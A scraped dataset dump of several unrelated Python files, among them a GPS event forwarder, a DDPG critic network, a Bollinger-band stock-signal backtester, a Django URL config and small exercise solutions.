web_page.uri.get_object_id())\n web_site.add_web_page(web_page)\n \n \"\"\" Sleep enough time to allow GC action \"\"\"\n print(\"Waiting for GC action...\")\n time.sleep(5)\n \n \"\"\" Modify web page \"\"\" \n web_page.uri.host = \"new_volatile_web\"\n \n \"\"\" Sleep enough time to allow GC action \"\"\"\n print(\"Waiting for GC action...\")\n time.sleep(5)\n \n \"\"\" Get web page \"\"\" \n self.assertEquals(web_page.uri.host, \"new_volatile_web\")\n \n logger.debug(\"Test OK!\")\n","sub_path":"tests/functional_tests/memory/gc_update_test.py","file_name":"gc_update_test.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160021463","text":"from django.conf.urls import url,include\nfrom django.contrib import admin\nfrom . import views\n\nurlpatterns = [\n url(r'^$',views.home),\n url(r'ask/$',views.askxml,name='askxml'),\n url(r'myform/$',views.myform,name='myform'),\n url(r'submitadd/$',views.submitadd,name='submitadd'),\n url(r'jsontest/$',views.jsontest,name='jsontest')\n]\n\n# Create your views here.\n","sub_path":"myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"203498933","text":"#!/usr/bin/python\nimport sys\nimport requests\nlist=sys.argv\n#element=list[1]\n#param=element.split(\",\")\nparam=[]\nfor i in range(0,11):\n param.append('868998030320317')\neid=\"1\"\n\ndesc=\"Evento:\"+eid\nif eid==\"1\" or eid==\"9\":\n desc=\"S.O.S\"\nif eid==\"3\":\n desc=\"ParoDeMotor\"\nif eid==\"4\":\n desc=\"EncendidoDeMotor\"\nif eid==\"5\":\n desc=\"Ubicacion\"\nif eid==\"6\":\n desc=\"CuentaExpirada\"\nif eid==\"7\":\n desc=\"Itinerario\"\nif eid==\"8\":\n desc=\"Otro\"\nif eid==\"23\":\n desc=\"CorteDeBateria\"\nif eid==\"28\":\n desc=\"CorteDeAntena\"\n\npluton=requests.get('https://pluto.dudewhereismy.com.mx/services/imeiInfo?imei='+param[1])\nresponse=pluton.json()\nif 'error' in response:\n if response['error']=='ok':\n if 'application_id' in response:\n app_id=response['application_id']\n if 'client_id' in response:\n client_id=response['client_id']\n else:\n client_id='No definido'\n if 'model' in response:\n model=response['model']\n else:\n model=\"nodef\"\n if 'color' in response:\n color=response['color']\n else:\n color='nocolor'\n if 'plates' in response:\n plates=response['plates']\n else:\n plates='noplates'\n if app_id==200 or app_id==559 or app_id==959:\n #NEZA\n desc='Neza_'+desc\n neza = requests.get('https://dispatch.dudewhereismy.com.mx/listener/neza?imei='+str(param[1])+'&event_id='+str(param[2])+'&event_desc='+desc+'&latitude='+str(param[4])+'&longitude='+str(param[5])+'&speed='+str(param[6])+'&azimuth='+str(param[7])+'&gpsvalid='+str(param[8])+'&rdatetime='+str(param[9])+'&vehicle='+str(model)+'|'+str(color)+'|'+str(plates)+\"&client_id=\"+str(client_id))\n neza = requests.get('http://c4neza.dwim.space/listener/one.html?imei='+str(param[1])+'&event_id='+str(param[2])+'&event_desc='+desc+'&latitude='+str(param[4])+'&longitude='+str(param[5])+'&speed='+str(param[6])+'&azimuth='+str(param[7])+'&gpsvalid='+str(param[8])+'&rdatetime='+str(param[9])+'&vehicle='+str(model)+'|'+str(color)+'|'+str(plates)+\"&client_id=\"+str(client_id))\n else:\n # KANAN\n if not desc[:6]==\"Evento\":\n internal_id=response['internal_id']\n if internal_id==3:\n desc='Kanan_'+desc\n kanan = requests.get('https://dispatch.dudewhereismy.com.mx/listener/kanan?imei='+str(param[1])+'&event_id='+str(param[2])+'&event_desc='+desc+'&latitude='+str(param[4])+'&longitude='+str(param[5])+'&speed='+str(param[6])+'&azimuth='+str(param[7])+'&gpsvalid='+str(param[8])+'&rdatetime='+str(param[9])+'&vehicle='+str(model)+'|'+str(color)+'|'+str(plates)+\"&client_id=\"+str(client_id))\n else:\n #print(\"gpscontrol\")\n desc='Plataforma3_'+desc\n kanan = requests.get('https://dispatch.dudewhereismy.com.mx/listener/plataforma3?imei='+str(param[1])+'&event_id='+str(param[2])+'&event_desc='+desc+'&latitude='+str(param[4])+'&longitude='+str(param[5])+'&speed='+str(param[6])+'&azimuth='+str(param[7])+'&gpsvalid='+str(param[8])+'&rdatetime='+str(param[9])+'&vehicle='+str(model)+'|'+str(color)+'|'+str(plates)+\"&client_id=\"+str(client_id))\n #else:\n #r = requests.get('https://dispatch.dudewhereismy.com.mx/listener/cp?account=' + param[0] + '&imei=' + param[1] + '&event_id=' + param[2] + '&event_desc=' + desc + '&latitude=' + param[4] + '&longitude=' + param[5] + '&speed=' + param[6] + '&azimuth=' + param[7] + '&gpsvalid=' + param[8] + '&rdatetime=' + param[9] + '&vehicle=' + param[10] + \"&internal_id=2\" + \"&client_id=\" + 'none')\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"535622551","text":"import numpy as np\nimport tensorflow as tf\n\n# Tensorflow layer imports\nfrom tensorflow.contrib.keras import layers, models, optimizers\nfrom tensorflow.contrib.keras import backend as K\nfrom tensorflow.contrib.keras import activations\nfrom tensorflow.contrib.keras import regularizers\nfrom tensorflow.contrib.keras import initializers\n\nclass Critic:\n\n\tdef __init__(self, state_size, action_size):\n\t\tself.state_size = state_size\n\t\tself.action_size = action_size\n\t\tself.build_model()\n\n\tdef build_model(self):\n\n\t\t# Define input layers\n\t\tinput_states = layers.Input(shape=(self.state_size,), name='input_states')\n\t\tinput_actions = layers.Input(shape=(self.action_size,), name='input_actions')\n\n\n\t\t#---------- copy from DDPG quadcopter ---------\n\t\t # Add hidden layer(s) for state pathway\n\t\tnet_states = layers.Dense(units=400 )(input_states)\n\t\t# net_states = layers.BatchNormalization()(net_states)\n\t\tnet_states = layers.Activation(\"relu\")(net_states)\n\n\t\tnet_states = layers.Dense(units=300)(net_states)\n\t\tnet_states = layers.Activation(\"relu\")(net_states)\n\n\t\t# Add hidden layer(s) for action pathway\n\t\tnet_actions = layers.Dense(units=300)(input_actions)\n\t\tnet_actions = layers.Activation(\"relu\")(net_actions)\n\n\t\t# net_actions = layers.Dense(units=250,kernel_regularizer=regularizers.l2(1e-7))(net_actions)\n\t\t# net_actions = layers.BatchNormalization()(net_actions)\n\t\t# net_actions = layers.Activation(\"relu\")(net_actions)\n\n\t\t# Combine state and action pathways\n\t\tnet = layers.Add()([net_states, net_actions])\n\t\tnet = layers.Activation('relu')(net)\n\n\t\tnet = layers.Dense(units=200, kernel_initializer=initializers.RandomUniform(minval=-0.5, maxval=0.5))(net)\n\t\tnet = layers.Activation('relu')(net)\n\n\t\t# Add final output layer to prduce action values (Q values)\n\t\tQ_values = layers.Dense(units=1, name='q_values')(net)\n\n\n\t\t# ---------------- Hidden layers for states ----------------\n\t\t# model_states = layers.Dense(units=32, activation=activations.sigmoid)(input_states)\n\t\t# # model_states = layers.BatchNormalization()(model_states)\n\n\t\t# model_states = layers.Dense(units=16, activation=activations.sigmoid)(model_states)\n\t\t# # model_states = layers.BatchNormalization()(model_states)\n\n\t\t# # model_states = layers.Dense(units=64)(model_states)\n\t\t# # model_states = layers.BatchNormalization()(model_states)\n\n\t\t# # ---------------- Hidden layers for actions ----------------\n\t\t# model_actions = layers.Dense(units=16, activation=activations.sigmoid)(input_actions)\n\t\t# # model_actions = layers.BatchNormalization()(model_actions)\n\t\t\n\t\t# model_actions = layers.Dense(units=16, activation=activations.sigmoid)(model_actions)\n\t\t# # model_actions = layers.BatchNormalization()(model_actions)\n\n\t\t# # Both models merge here\n\t\t# model = layers.add([model_states, model_actions])\n\n\t\t# # Fully connected and batch normalization\n\t\t# model = layers.Dense(units=8, activation=activations.sigmoid)(model)\n\t\t# # model = layers.BatchNormalization()(model)\n\n\t\t# # model = layers.Dense(units=64, activation=activations.relu)(model)\n\t\t# # model = layers.BatchNormalization()(model)\n\n\t\t# # Q values / output layer\n\t\t# Q_values = layers.Dense(units=1, name='Q_s_a')(model)\n\t\t# # model = layers.BatchNormalization()(model)\n\n\t\t# Keras wrap the model \n\t\tself.model = models.Model(inputs=[input_states, input_actions], outputs=Q_values)\n\n\t\toptimizer = optimizers.Adam(lr=0.0001)\n\t\tself.model.compile(optimizer=optimizer, loss='mse')\n\n\t\taction_gradients = K.gradients(Q_values, input_actions)\n\t\tself.get_action_gradients = K.function(\n\t\t\tinputs=[*self.model.input, K.learning_phase()],\n\t\t\toutputs=action_gradients)\n\n\n\n\n\n\n","sub_path":"DDPG/Critic.py","file_name":"Critic.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"510145263","text":"# author: mofhu@github\n# A. Crossmarket\n\nt = int(input())\n\nfor ncase in range(1, t+1):\n n, m = [int(s) for s in input().split(' ')]\n if n == 1 and m == 1:\n ans = 0\n else:\n ans = 2* (min(n, m)) + max(n, m) - 2\n print(ans)\n","sub_path":"codeforces/Round816/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"106045457","text":"#threshold_days for the BB squeeze\n\nstocks = ['ADANIPORTS.NS', 'ASIANPAINT.NS', 'AXISBANK.NS', 'BAJAJ-AUTO.NS', 'BAJFINANCE.NS', 'BAJAJFINSV.NS', 'BHARTIARTL.NS', 'BPCL.NS', 'BRITANNIA.NS', 'CIPLA.NS', 'COALINDIA.NS', 'DIVISLAB.NS', 'DRREDDY.NS', 'EICHERMOT.NS', 'GAIL.NS', 'GRASIM.NS', 'HDFC.NS', 'HDFCBANK.NS', 'HDFCLIFE.NS', 'HEROMOTOCO.NS', 'HINDALCO.NS', 'HINDUNILVR.NS', 'ICICIBANK.NS', 'INDUSINDBK.NS', 'INFY.NS', 'IOC.NS', 'IRCON.NS', 'ITC.NS', 'JSWSTEEL.NS', 'KOTAKBANK.NS', 'LT.NS', 'M&M.NS', 'MARUTI.NS', 'NESTLEIND.NS', 'NTPC.NS', 'ONGC.NS', 'POWERGRID.NS', 'RELIANCE.NS', 'SBILIFE.NS', 'SBIN.NS', 'SHREECEM.NS', 'SUNPHARMA.NS', 'TATAMOTORS.NS', 'TATASTEEL.NS', 'TCS.NS', 'TECHM.NS', 'TITAN.NS', 'ULTRACEMCO.NS', 'UPL.NS', 'WIPRO.NS', 'AMBUJACEM.NS', 'BIRLACORPN.NS', 'CUB.NS', 'DCBBANK.NS', 'DFMFOODS.NS', 'DOLLAR.NS', 'ESCORTS.NS', 'HCG.NS', 'HCLTECH.NS', 'ISEC.NS', 'LUXIND.NS', 'NTPC.NS', 'PSPPROJECT.NS', 'SHREECEM.NS', 'SUBROS.NS', 'SPANDANA.NS', 'ULTRACEMCO.NS']\nstocksIown = ['WIPRO.NS', 'LUXIND.NS', 'DFMFOODS.NS', 'SUBROS.NS']\n#stocks = ['ADANIPORTS.csv', 'ASIANPAINT.csv', 'AXISBANK.csv']\n#This bot uses a variety of technical indicators to generate buy and sell calls of any stock.\n\n#Importing the needed libraries:\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport matplotlib\nplt.style.use('fivethirtyeight')\n\n\n\ndef test (stock):\n # Loading the data and making the date the index\n df = pd.read_csv(stock)\n df = df.set_index(pd.DatetimeIndex(df['Date']))\n\n # BOLLINGER BANDS CALCULATIONS\n Middle_band = df['Close'].rolling(window=20).mean() # MIDDLE BAND\n STD = df['Close'].rolling(window=20).std() # STD DEVIATION\n Upper_band = Middle_band + (STD * 2) # UPPER BAND\n Lower_band = Middle_band - (STD * 2) # LOWER BAND\n Bollinger_Band_Width = (Upper_band - Lower_band) / Middle_band # BOLLINGER BAND WIDTH\n\n # RSI CALCULATIONS\n delta = df['Close'].diff(1) # get the difference between closing prices\n delta = delta.dropna()\n up = delta.copy() # Get positive and negative gains/losses between 2 closing prices\n down = delta.copy()\n up[up < 0] = 0\n down[down > 0] = 0\n AVG_Gain = up.rolling(window=14).mean() # Calculate average gain and loss\n AVG_Loss = abs(down.rolling(window=14).mean())\n RS = AVG_Gain / AVG_Loss # Calculate relative strength\n RSI = 100.0 - (100.0 / (1.0 + RS)) # Calculate RSI\n\n # DEMA CALCULATIONS\n def DEMA(data, time_period, column):\n EMA = data[column].ewm(span=time_period, adjust=False).mean()\n DEMA = (2 * EMA) - (EMA.ewm(span=time_period, adjust=False).mean())\n return DEMA\n\n # MACD CALCULATIONS\n ShortEMA = df.Close.ewm(span=12, adjust=False).mean()\n LongEMA = df.Close.ewm(span=26, adjust=False).mean()\n MACD = ShortEMA - LongEMA\n Signal = MACD.ewm(span=9, adjust=False).mean()\n\n # MAKE A NEW DATA FRAME TO STORE ALL THIS\n new_df = pd.DataFrame()\n new_df['Close'] = df['Close']\n new_df['Open'] = df['Open']\n new_df['Middle_band'] = Middle_band\n new_df['STD'] = STD\n new_df['Upper_band'] = Upper_band\n new_df['Lower_band'] = Lower_band\n new_df['Band_width'] = Bollinger_Band_Width\n new_df['RSI'] = RSI\n new_df['DEMA_short'] = DEMA(new_df, 20, 'Close')\n new_df['DEMA_long'] = DEMA(new_df, 50, 'Close')\n new_df['MACD'] = MACD\n new_df['Signal'] = Signal\n\n # Function to get the index of any value you input\n def getIndex(dfCol, val):\n i = 0\n while i < len(dfCol):\n if dfCol[i] == val:\n return i\n else:\n i += 1\n return None\n\n # THIS FUNCTION DOES THE FOLLOWING:\n # Generate buy calls when BB price breaks and closes above middle band and RSI > 50\n # Generate sell calls when price closes above the upper BB band and RSI > 70\n # Generate buy calls when price closes below the lower BB band and RSI < 30\n def buy_or_sell_call(dataframe):\n buy_signal_normal = []\n sell_signal = []\n buy_signal_lower_band = []\n\n for index in range(len(dataframe['Close'])):\n if dataframe['Close'][index] > dataframe['Upper_band'][index] and dataframe['RSI'][index] > 72:\n sell_signal.append(dataframe['Close'][index])\n buy_signal_lower_band.append(np.nan)\n buy_signal_normal.append(np.nan)\n\n elif dataframe['Close'][index] > dataframe['Middle_band'][index] and dataframe['RSI'][index] > 50:\n sell_signal.append(np.nan)\n buy_signal_lower_band.append(np.nan)\n if dataframe['Close'][index - 1] < dataframe['Middle_band'][index - 1]: # Then you should buy\n buy_signal_normal.append(dataframe['Close'][index])\n else:\n buy_signal_normal.append(np.nan)\n\n elif dataframe['Close'][index] < dataframe['Lower_band'][index] and dataframe['RSI'][index] < 30:\n sell_signal.append(np.nan)\n buy_signal_normal.append(np.nan)\n buy_signal_lower_band.append(dataframe['Close'][index])\n\n else:\n buy_signal_normal.append(np.nan)\n sell_signal.append(np.nan)\n buy_signal_lower_band.append(np.nan)\n\n return buy_signal_normal, sell_signal, buy_signal_lower_band\n\n # separate them here\n # in the next step you can make 2 separate columns in new_df\n # then do what u want for that 1 column of the separate buy - u can append it in the list which already exists\n\n # Add new columns to our dataframe indicating the buy and sell signals we just got:\n new_df['Buy_Signal_Normal'] = buy_or_sell_call(new_df)[0]\n new_df['Sell_Signal'] = buy_or_sell_call(new_df)[1]\n new_df['Buy_Signal_Lower_Band'] = buy_or_sell_call(new_df)[2]\n pd.set_option('display.max_columns', None) # or 1000\n pd.set_option('display.max_rows', None) # or 1000\n pd.set_option('display.max_colwidth', None) # or 199\n # print (new_df)\n\n # When the buy call is generated. At the same time, look at the price of the lower BB. if in the next 10 days price goes below it then sell.\n # days_ahead = 1\n # for p in new_df['Buy_Signal_Normal']:\n # if not math.isnan(p):\n # index = index = getIndex(new_df['Buy_Signal_Normal'], p)\n # if len(new_df) - index > days_ahead:\n # for b in range(index, index + days_ahead):\n # if new_df['Close'][b] > new_df['Lower_band'][index]:\n # pass\n # else:\n # new_df['Sell_Signal'][b] = new_df['Close'][b]\n # else:\n # for b in range(index, len(new_df)):\n # if new_df['Close'][b] > new_df['Lower_band'][index]:\n # pass\n # else:\n # new_df['Sell_Signal'][b] = new_df['Close'][b]\n\n # Combine the two buy lists into 1 list\n new_df['Buy_Signal'] = np.nan\n l = 0\n while l < len(new_df['Buy_Signal_Normal']):\n if math.isnan(new_df['Buy_Signal_Normal'][l]) and math.isnan(new_df['Buy_Signal_Lower_Band'][l]):\n new_df['Buy_Signal'][l] = np.nan\n elif not math.isnan(new_df['Buy_Signal_Normal'][l]):\n new_df['Buy_Signal'][l] = new_df['Buy_Signal_Normal'][l]\n else:\n new_df['Buy_Signal'][l] = new_df['Buy_Signal_Lower_Band'][l]\n l += 1\n\n new_df['stop_margin'] = new_df['Buy_Signal'] * 0.25 # 10% RETURNS\n\n # The following block of code gives a sell signal every time you meet your target price (10% of the price you bought at)\n new_df['Sell'] = np.nan\n for Buy_Price in new_df['Buy_Signal']:\n flag = 1\n if not math.isnan(Buy_Price):\n index = getIndex(new_df['Buy_Signal'], Buy_Price)\n for j in range(index, len(new_df)):\n if new_df['Close'][j] > Buy_Price + new_df['stop_margin'][index] and flag == 1:\n new_df['Sell'][j] = new_df['Close'][j]\n flag = 0\n\n # This block of code gives another buy signal if the closing price doesnt go below middle BB 2 days after selling through target price\n new_df['Buy'] = np.nan\n for Sell_Price in new_df['Sell']:\n flag = 1\n if not math.isnan(Sell_Price):\n index = getIndex(new_df['Sell'], Sell_Price)\n numDaysAhead = 2\n condition = True\n if len(new_df['Close']) - index > (numDaysAhead + 1):\n for i in range(index, index + numDaysAhead + 1):\n if new_df['Close'][i] > new_df['Middle_band'][i]:\n condition = condition and True\n else:\n condition = condition and False\n if condition == True:\n new_df['Buy'][index + numDaysAhead] = new_df['Close'][index + numDaysAhead]\n else:\n for i in range(index, len(new_df['Close'])):\n if new_df['Close'][i] > new_df['Middle_band'][i]:\n condition = condition and True\n else:\n condition = condition and False\n if condition == True:\n new_df['Buy'][index + (len(new_df['Close']) - i - 1)] = new_df['Close'][\n index + (len(new_df['Close']) - i - 1)]\n\n # This is to combine the 2 buy and sell lists with each other to create 2 final lists: Final_Buy and Final_Sell\n new_df['Final_Buy'] = np.nan\n new_df['Final_Sell'] = np.nan\n i = 0\n while i < len(new_df['Buy_Signal']):\n if math.isnan(new_df['Buy_Signal'][i]) and math.isnan(new_df['Buy'][i]):\n new_df['Final_Buy'][i] = np.nan\n elif not math.isnan(new_df['Buy_Signal'][i]):\n new_df['Final_Buy'][i] = new_df['Buy_Signal'][i]\n else:\n new_df['Final_Buy'][i] = new_df['Buy'][i]\n\n if math.isnan(new_df['Sell_Signal'][i]) and math.isnan(new_df['Sell'][i]):\n new_df['Final_Sell'][i] = np.nan\n elif not math.isnan(new_df['Sell_Signal'][i]):\n new_df['Final_Sell'][i] = new_df['Sell_Signal'][i]\n else:\n new_df['Final_Sell'][i] = new_df['Sell'][i]\n i += 1\n\n # The following block of code gets the value of BB squeeze\n new_df['BB_Squeeze'] = np.nan\n\n threshold_days = 30\n max_breaks = 0\n band_width_value = 0.24\n i = 0\n consecutive = 0\n breaks = 0\n\n while i < len(new_df):\n if new_df['Band_width'][i] < band_width_value:\n consecutive += 1\n else:\n breaks += 1\n if breaks > max_breaks:\n consecutive = 0\n breaks = 0\n if consecutive >= threshold_days:\n new_df['BB_Squeeze'][i] = consecutive\n i += 1\n\n # This part gets the index of the BB Squeeze\n new_df['test'] = np.nan\n f = 0\n sequence = 0\n index = 0\n while f < len(new_df['BB_Squeeze']):\n if not math.isnan(new_df['BB_Squeeze'][f]):\n flag = 1\n sequence += 1\n if math.isnan(new_df['BB_Squeeze'][f]):\n flag = 0\n if sequence > 0:\n index += getIndex(new_df['BB_Squeeze'][index:], ((threshold_days - 1) + sequence))\n new_df['test'][index] = sequence\n flag = 1\n sequence = 0\n f += 1\n\n # This code checks the closing price before the last BB squeeze value. If it goes above the top bracket, then buy\n # If it goes below the bottom bracket, then sell\n days_to_check_closing_price = 9\n days_not_to_generate_buy_or_sell_call = 16\n\n for value in new_df['test']:\n if not math.isnan(value):\n index = getIndex(new_df['test'], value)\n\n for i in range(index - days_to_check_closing_price, index):\n if new_df['Close'][i] > new_df['Upper_band'][i]:\n new_df['Final_Buy'][i] = new_df['Close'][i]\n if (len(new_df['Close']) - i) > days_not_to_generate_buy_or_sell_call:\n for days in range(0, days_not_to_generate_buy_or_sell_call):\n new_df['Final_Sell'][i + days] = np.nan\n else:\n for days in range(0, (len(new_df['Close']) - i)):\n new_df['Final_Sell'][i + days] = np.nan\n\n if new_df['Close'][i] < new_df['Lower_band'][i]:\n new_df['Final_Sell'][i] = new_df['Close'][i]\n if (len(new_df['Close']) - i) > days_not_to_generate_buy_or_sell_call:\n for days in range(0, days_not_to_generate_buy_or_sell_call):\n new_df['Final_Buy'][i + days] = np.nan\n else:\n for days in range(0, (len(new_df['Close']) - i)):\n new_df['Final_Buy'][i + days] = np.nan\n\n if not math.isnan(new_df['Final_Buy'][-1]):\n print (stock + \" BUY\")\n if not math.isnan(new_df['Final_Sell'][-1]):\n print (stock + \" SELL\")\n\n\n # This part calculates the return on investment, percentage gain, etc.\n money = 0\n number_of_stocks = 0\n investment = 0\n a = 0\n invests = []\n while a < (len(new_df['Buy'])):\n if not math.isnan(new_df['Final_Buy'][a]):\n money = money - new_df['Final_Buy'][a]\n investment = investment + new_df['Final_Buy'][a]\n number_of_stocks = number_of_stocks + 1\n invests.append(money)\n\n elif not math.isnan(new_df['Final_Sell'][a]):\n money = money + (new_df['Final_Sell'][a] * number_of_stocks)\n number_of_stocks = 0\n invests.append(money)\n\n a += 1\n\n if number_of_stocks > 0:\n money = money + number_of_stocks * new_df['Close'][-1]\n number_of_stocks = 0\n\n investment = abs(min(invests))\n percentage_return = (money / investment) * 100\n final_money = investment + money\n\n # print('We gained:', money)\n # print(\"Money invested: \", investment)\n # print(\"Now you have: \", final_money)\n print(\"Percentage return: \", percentage_return, '%')\n # print(\"number of stocks in hand: \", number_of_stocks)\n\n pp = (new_df[\"Close\"][-1] / new_df[\"Close\"][0])-1\n\n bot = (final_money/investment)-1\n final = bot - pp\n\n\n print (new_df['Close'][-1])\n\n # This part simply generates a plot of the closing price, with all the buy and sell signals.\n\n fig = plt.figure(figsize=(12.2, 4.5))\n ax = fig.add_subplot(1, 1, 1)\n x_axis = new_df.index\n ax.fill_between(x_axis, new_df['Upper_band'], new_df['Lower_band'], color='grey')\n ax.plot(x_axis, new_df['Close'], color='gold', lw=3, label='Close Price',\n alpha=0.5) # Plot closing price and moving average\n ax.plot(x_axis, new_df['Middle_band'], color='blue', lw=3, label='Simple Moving Average', alpha=0.5)\n ax.scatter(x_axis, new_df['Final_Buy'], color='green', lw=3, label='Buy', marker='^', alpha=1)\n ax.scatter(x_axis, new_df['Final_Sell'], color='red', lw=3, label='Sell', marker='v', alpha=1)\n ax.set_title(stock)\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Price\")\n plt.xticks(rotation=45)\n ax.legend()\n plt.show()\n\n return final, pp, bot\n\nstock_list = []\npp = []\nbot = []\nfinal =[]\n\nfor stock in stocksIown:\n test(stock)\n #stock_list.append(stock)\n #excel = pd.DataFrame()\n #excel['Stocks'] = stock_list\n #final.append(test(stock)[0])\n #pp.append(test(stock)[1])\n #bot.append(test(stock)[2])\n #excel['final'] = final\n #excel ['pp'] = pp\n #excel ['bot'] = bot\n #excel.to_excel(r'/Users/arjun/Desktop/FINAL TESTING.xlsx', index=False, header=True)\n\n#print (excel)\n\n\n","sub_path":"Testing The Bot/generating graphs for each stock.py","file_name":"generating graphs for each stock.py","file_ext":"py","file_size_in_byte":15761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618135882","text":"import os\nimport sys\nimport tarfile\nimport cStringIO\nif not os.path.dirname(__file__) in sys.path:\n sys.path.append(os.path.dirname(__file__))\nimport configuring\n\n\nclass StaticConfiguringHandler(configuring.ConfiguringHandler):\n\n def create_configuration(self):\n\n # create in-memory buffer\n f = cStringIO.StringIO()\n archive = tarfile.open(mode='w', fileobj=f)\n\n # add file or folder to archive\n src_path = self.config[\"src_path\"]\n src_path = os.path.expandvars(src_path)\n archive_path = self.config[\"archive_path\"]\n archive.add(src_path, arcname=archive_path)\n\n #\n c = configuring.ConfigurationArchive()\n c.archive_buffer = f.getvalue()\n c.instance_role = self.config[\"instance_role\"]\n\n return c\n\n\nclass BundleConfiguringHandler(configuring.ConfiguringHandler):\n\n def create_configuration(self):\n names = self.config[\"configuration\"]\n return configuring.create_configuration_bundle(\n self.service, names)\n","sub_path":"apps/msaas/bin/configuring_handlers.py","file_name":"configuring_handlers.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"193958194","text":"\"\"\"ForeCut \\\\ Pipeline :: Save image(s)\"\"\"\n\nimport os\n\nimport skimage.io\n\nfrom forecut_pipeline.pipeline import Pipeline\n\n\nclass SaveImage(Pipeline):\n \"\"\"Pipeline task to save images.\"\"\"\n\n def __init__(self, src, path, image_ext=\"png\"):\n self.src = src\n self.path = path\n self.image_ext = image_ext\n\n super().__init__()\n\n def map(self, data):\n image = data[self.src]\n image_id = data[\"image_id\"]\n\n # Prepare output for image based on image_id\n output = image_id.split(os.path.sep)\n dirname = output[:-1]\n if len(dirname) > 0:\n dirname = os.path.join(*dirname)\n dirname = os.path.join(self.path, dirname)\n os.makedirs(dirname, exist_ok=True)\n else:\n dirname = self.path\n filename = f\"{output[-1].rsplit('.', 1)[0]}.{self.image_ext}\"\n path = os.path.join(dirname, filename)\n\n skimage.io.imsave(\n path, image,\n )\n\n return data\n","sub_path":"trashpanda-ds/pipeline/Mask_RCNN/forecut_pipeline/save_image.py","file_name":"save_image.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637958314","text":"''' For today's challenge, you will get a list of fractions\nwhich you will add together and produce the resulting fraction,\nreduced as far as possible.\n'''\n\ndef factors(n):\n ''' int -> list\n Return a list of factors of n\n '''\n lst = []\n for x in range(1, n):\n if n % x == 0:\n lst.append(x)\n return lst\n\ndef reduce_fraction(n, n2):\n ''' number -> tuple\n Return a fraction reduced\n to its factors '''\n temp = 0\n temp2 = 0\n\n master_lst = []\n master_lst2 = []\n lst1 = (factors(n))\n lst2 = (factors(n2))\n master_lst.extend(lst1)\n master_lst.extend(lst2)\n\n for items in master_lst:\n if items not in master_lst2:\n master_lst2.append(items)\n\n for x in range(0, len(master_lst2)):\n num = master_lst2[x]\n if n % num == 0 and n2 % num == 0:\n div = n / master_lst2[x]\n div2 = n2 / master_lst2[x]\n\n temp = div\n temp2 = div2\n\n return (int(div), int(div2))\n\nif __name__ == '__main__':\n amount = input('How many fractions? ')\n amount = int(amount)\n lst = []\n n = 0\n while n != amount:\n fraction = (input('Enter fraction in the form \"a/b\" '))\n lst.append(fraction)\n n += 1\n\n product = 1\n denominator = 1\n\n for fract in lst:\n seperator = fract.index('/')\n\n # product of denominators\n denominator = int(fract[seperator + 1:])\n # multiply and add denominator to product\n product *= denominator\n\n\n mult = 0\n temp = 0\n\n for y in lst:\n # seperator, index of forward slash\n seperator = y.index('/')\n numerator = y[:seperator]\n denominator = int(y[seperator + 1:])\n numerator = int(numerator)\n mult += int((product / denominator) * numerator)\n ans = reduce_fraction(product, mult)\n\n print('Answer = {0}/{1}'.format(ans[1], ans[0]))","sub_path":"albums/3/challenge226_easy/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"386402313","text":"import Tkinter as tk\nimport ttk, sys, obj\nclass Application(tk.Frame):\n\tdef __init__(self, master=None):\n\t\tprint('initializing')\n\t\ttk.Frame.__init__(self, master)\n\t\tself.master.title('Application')\n\t\tself.grid()\n\t\tself.createWidgets()\n\tdef createWidgets(self):\n\t\tself.quitButton = ttk.Button(self, text='Quit', command=self.quit)\n\t\tself.quitButton.grid()\n\n\t\tself.testButton = ttk.Button(self, text='Test', command=obj.load)\n\t\tself.testButton.grid()\n\tdef quit(self):\n\t\tprint('terminating')\n\t\tsys.exit()\n\nApplication().mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"429783330","text":"f = open(\"DATA11.txt\", \"r\")\n\nfor q in range(10):\n input = list(map(int, f.readline().split()))\n n = input[0]\n m = input[1]\n key = [[], [], [], []]\n for i in range(0,4):\n key[i] = list(f.readline().split())\n a = list(f.readline())\n a.insert(0, '')\n\n for k in range(m-1):\n\n a[-1] = a[1]\n a[0] = a[-2]\n b = a[:]\n\n for i in range(n):\n x = a[i]\n y = a[i+2]\n z = x + y\n for j in range(len(key)):\n if key[j][0] == z:\n b[i+1] = key[j][1]\n break\n a = b[:]\n print(''.join((a[1:n+1])))\n f.readline()","sub_path":"2017_regional/P1.py","file_name":"P1.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"147371165","text":"def sort_by_name_length(members_list: list):\n members_list.sort(key=lambda member: member['age'])\n return sorted(members_list, key=lambda member: len(member['name']))\n\n\nif __name__ == '__main__':\n import copy\n from utils.task_1 import members as MEMBERS\n\n members = copy.deepcopy(MEMBERS)\n\n print(members)\n print(sort_by_name_length(members))\n","sub_path":"week2/lesson2-intro-to-functional/homework/EugeneZabolotny/utils/task_6.py","file_name":"task_6.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 